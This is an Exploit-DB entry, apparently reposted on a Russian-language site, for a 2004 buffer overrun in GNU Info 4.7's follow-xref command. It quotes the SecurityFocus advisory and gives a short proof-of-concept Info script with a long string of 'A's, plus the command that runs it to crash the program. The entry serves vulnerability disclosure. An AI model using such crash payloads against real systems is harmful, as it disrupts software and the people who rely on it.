- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24355
- Проверка EDB
-
- Пройдено
- Автор
- JOSH MARTIN
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2004-08-06
GNU Info 4.7 - Follow XRef Buffer Overrun
Код:
source: https://www.securityfocus.com/bid/10882/info
GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.
An attacker may exploit this vulnerability by crafting a malicious Info script that is sufficient to trigger the issue.
Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.
The following can be saved to a file and called as:
info info --restore=info.bug to create a segmentation fault.
[START info.bug]
gExpert Info
fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[END info.bug]- Источник
- www.exploit-db.com
